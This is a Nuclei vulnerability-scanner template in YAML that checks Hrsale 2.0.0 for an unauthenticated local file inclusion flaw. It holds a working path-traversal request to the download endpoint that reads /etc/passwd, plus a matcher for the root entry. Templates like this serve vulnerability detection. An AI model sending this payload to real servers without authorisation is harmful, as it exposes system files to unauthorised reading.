nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi....

25 lines
598 B
YAML

id: hrsale-unauthenticated-lfi
info:
name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi
author: 0x_Akoko
severity: high
description: This exploit allow you to download any readable file from server without permission and login session
reference: https://www.exploit-db.com/exploits/48920
tags: hrsale,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200